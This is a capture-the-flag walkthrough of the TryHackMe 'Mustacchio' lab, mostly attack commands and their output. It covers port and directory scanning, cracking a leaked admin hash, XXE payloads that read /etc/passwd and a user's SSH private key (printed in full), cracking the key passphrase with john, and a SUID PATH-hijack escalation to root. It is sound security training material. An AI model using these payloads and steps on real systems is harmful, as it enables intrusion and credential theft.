Disclaimers
The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.
Service discovery
┌──(root💀kali)-[~/tryhackme/Mustacchio] └─# nmap -sV -Pn 10.10.7.89 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-08 01:33 EST Nmap scan report for 10.10.7.89 Host is up (0.34s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 45.25 seconds
It seems that only two services are enabled
Blasting catalogue
┌──(root💀kali)-[~/dirsearch] └─# python3 dirsearch.py -e* -t 100 -u http://10.10.7.89 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492 Output File: /root/dirsearch/reports/10.10.7.89/_21-11-08_01-36-40.txt Error Log: /root/dirsearch/logs/errors-21-11-08_01-36-40.log Target: http://10.10.7.89/ [01:36:41] Starting: [01:37:08] 200 - 3KB - /about.html [01:37:42] 400 - 305B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [01:37:45] 200 - 1KB - /contact.html [01:37:47] 200 - 1KB - /custom/ [01:37:56] 301 - 314B - /fonts -> http://10.10.7.89/fonts/ [01:37:57] 200 - 2KB - /gallery.html [01:38:01] 200 - 2KB - /index.html [01:38:02] 301 - 315B - /images -> http://10.10.7.89/images/ [01:38:02] 200 - 6KB - /images/ [01:38:30] 200 - 28B - /robots.txt [01:38:31] 403 - 278B - /server-status [01:38:32] 403 - 278B - /server-status/
/custom / has a directory traversal vulnerability. Find a users.bak file here, download it and view it with the strings command
┌──(root💀kali)-[~/Downloads] └─# strings users.bak SQLite format 3 tableusersusers CREATE TABLE users(username text NOT NULL, password text NOT NULL) ]admin1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
We see a list of SQLite users with user name and password: admin: 1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
Hash get This awesome md5 decryption website , the solution is:
bulldog19
So what is the login certificate of the service? I tried ssh, but I couldn't find the landing page. I used a web dictionary to explode the directory again, and no new directory burst out
Full port scan
I have a habit when doing lab. generally, I use nmap to quickly scan the common ports. After scanning, I start to penetrate the common ports and scan the whole port again. When I look back at the full port scanning, I find that the target also has an http service at port 8765
┌──(root💀kali)-[~/tryhackme/Mustacchio] └─# nmap -sV -Pn 10.10.7.89 -p- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-08 01:35 EST Nmap scan report for 10.10.7.89 Host is up (0.31s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 8765/tcp open http nginx 1.10.3 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1139.53 seconds
The browser opens a login page, which uses the login credentials above.
xxe attack
After logging in, there was a message page. I tried to enter some information without any return. I truncated the http request with burpsuite and put it in the repeater. I found that the echo source code revealed two information
First, the input content must be in xml format. Second, there is a line of comments in the web page source code:
Barry, you can now SSH in using your key!
Now we know at least one ssh user name: barry
I googled xxe php and found it This article about xxe
We construct a payload and try to read the data in / etc/passwd
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
<name>&xxe;</name>
</root>Successfully received echo on Web page
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false joe:x:1002:1002::/home/joe:/bin/bash barry:x:1003:1003::/home/barry:/bin/bash
We tried to blow up barry's ssh password before, but were told not to allow password login
Using the xxe vulnerability, we try to read barry's ssh secret key information. The user secret key is usually placed in / home/$USER/.ssh/id_rsa
We construct the following payload
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >
]>
<root>
<name>&xxe;</name>
</root>
Successfully received secret key echo
-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E jqDJP+blUr+xMlASYB9t4gFyMl9VugHQJAylGZE6J/b1nG57eGYOM8wdZvVMGrfN bNJVZXj6VluZMr9uEX8Y4vC2bt2KCBiFg224B61z4XJoiWQ35G/bXs1ZGxXoNIMU MZdJ7DH1k226qQMtm4q96MZKEQ5ZFa032SohtfDPsoim/7dNapEOujRmw+ruBE65 l2f9wZCfDaEZvxCSyQFDJjBXm07mqfSJ3d59dwhrG9duruu1/alUUvI/jM8bOS2D Wfyf3nkYXWyD4SPCSTKcy4U9YW26LG7KMFLcWcG0D3l6l1DwyeUBZmc8UAuQFH7E NsNswVykkr3gswl2BMTqGz1bw/1gOdCj3Byc1LJ6mRWXfD3HSmWcc/8bHfdvVSgQ ul7A8ROlzvri7/WHlcIA1SfcrFaUj8vfXi53fip9gBbLf6syOo0zDJ4Vvw3ycOie TH6b6mGFexRiSaE/u3r54vZzL0KHgXtapzb4gDl/yQJo3wqD1FfY7AC12eUc9NdC rcvG8XcDg+oBQokDnGVSnGmmvmPxIsVTT3027ykzwei3WVlagMBCOO/ekoYeNWlX bhl1qTtQ6uC1kHjyTHUKNZVB78eDSankoERLyfcda49k/exHZYTmmKKcdjNQ+KNk 4cpvlG9Qp5Fh7uFCDWohE/qELpRKZ4/k6HiA4FS13D59JlvLCKQ6IwOfIRnstYB8 7+YoMkPWHvKjmS/vMX+elcZcvh47KNdNl4kQx65BSTmrUSK8GgGnqIJu2/G1fBk+ T+gWceS51WrxIJuimmjwuFD3S2XZaVXJSdK7ivD3E8KfWjgMx0zXFu4McnCfAWki ahYmead6WiWHtM98G/hQ6K6yPDO7GDh7BZuMgpND/LbS+vpBPRzXotClXH6Q99I7 LIuQCN5hCb8ZHFD06A+F2aZNpg0G7FsyTwTnACtZLZ61GdxhNi+3tjOVDGQkPVUs pkh9gqv5+mdZ6LVEqQ31eW2zdtCUfUu4WSzr+AndHPa2lqt90P+wH2iSd4bMSsxg laXPXdcVJxmwTs+Kl56fRomKD9YdPtD4Uvyr53Ch7CiiJNsFJg4lY2s7WiAlxx9o vpJLGMtpzhg8AXJFVAtwaRAFPxn54y1FITXX6tivk62yDRjPsXfzwbMNsvGFgvQK DZkaeK+bBjXrmuqD4EB9K540RuO6d7kiwKNnTVgTspWlVCebMfLIi76SKtxLVpnF 6aak2iJkMIQ9I0bukDOLXMOAoEamlKJT5g+wZCC5aUI6cZG0Mv0XKbSX2DTmhyUF ckQU/dcZcx9UXoIFhx7DesqroBTR6fEBlqsn7OPlSFj0lAHHCgIsxPawmlvSm3bs 7bdofhlZBjXYdIlZgBAqdq5jBJU8GtFcGyph9cb3f+C3nkmeDZJGRJwxUYeUS9Of 1dVkfWUhH2x9apWRV8pJM/ByDd0kNWa/c//MrGM0+DKkHoAZKfDl3sC0gdRB7kUQ +Z87nFImxw95dxVvoZXZvoMSb7Ovf27AUhUeeU8ctWselKRmPw56+xhObBoAbRIn 7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD -----END RSA PRIVATE KEY-----
We save the above secret key as an ID on kali_ RSA file, 600
This secret key cannot log in normally. You need to use john to crack the secret key password:
┌──(root💀kali)-[~/tryhackme/Mustacchio]
└─# /usr/share/john/ssh2john.py id_rsa >rsacrack
┌──(root💀kali)-[~/tryhackme/Mustacchio]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt rsacrack
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames (id_rsa)
1g 0:00:00:23 37.67% (ETA: 02:48:42) 0.04221g/s 233721p/s 233721c/s 233721C/s mikkedhaile..mikkal1933
Session abortedGet the password: urieljames
Get the initial shell
Successfully log in to barry's ssh and get user.txt
┌──(root💀kali)-[~/tryhackme/Mustacchio] └─# ssh -i id_rsa barry@10.10.7.89 1 ⨯ Enter passphrase for key 'id_rsa': Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 34 packages can be updated. 16 of these updates are security updates. To see these additional updates run: apt list --upgradable The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. barry@mustacchio:~$ ls user.txt
Raise authority to root
Find all SUID files on the target
barry@mustacchio:~$ find / -perm -4000 -print /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/passwd /usr/bin/pkexec /usr/bin/chfn /usr/bin/newgrp /usr/bin/at /usr/bin/chsh /usr/bin/newgidmap /usr/bin/sudo /usr/bin/newuidmap /usr/bin/gpasswd /home/joe/live_log /bin/ping /bin/ping6 /bin/umount /bin/mount /bin/fusermount /bin/su
We found a special file / home/joe/live_log, use the strings command to view the contents of this file
barry@mustacchio:/home/joe$ strings live_log /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid printf system __cxa_finalize setgid __libc_start_main GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u+UH []A\A]A^A_ Live Nginx Log Reader tail -f /var/log/nginx/access.log
Note that this line of shell code tail -f /var/log/nginx/access.log indicates that the SUID file will call the tail command to listen for web logs.
We can use the above shell command to raise the authority to root
Write / home/barry to $PATH
barry@mustacchio:/home/joe$ export PATH=/home/barry:$PATH
View the current user's $PATH
barry@mustacchio:/home/joe$ echo $PATH /home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Create a tail file and give execution permission
barry@mustacchio:/home/joe$ touch /home/barry/tail barry@mustacchio:/home/joe$ chmod +x /home/barry/tail
Write the following shell into / home/barry/tail
#!/bin/bash bash -p
Execute live_log, the right is successfully raised to root
barry@mustacchio:/home/joe$ vi /home/barry/tail barry@mustacchio:/home/joe$ cat /home/barry/tail #!/bin/bash bash -p barry@mustacchio:/home/joe$ ./live_log root@mustacchio:/home/joe# id uid=0(root) gid=0(root) groups=0(root),1003(barry) root@mustacchio:/home/joe# whoami root root@mustacchio:/home/joe# cat /root/root.txt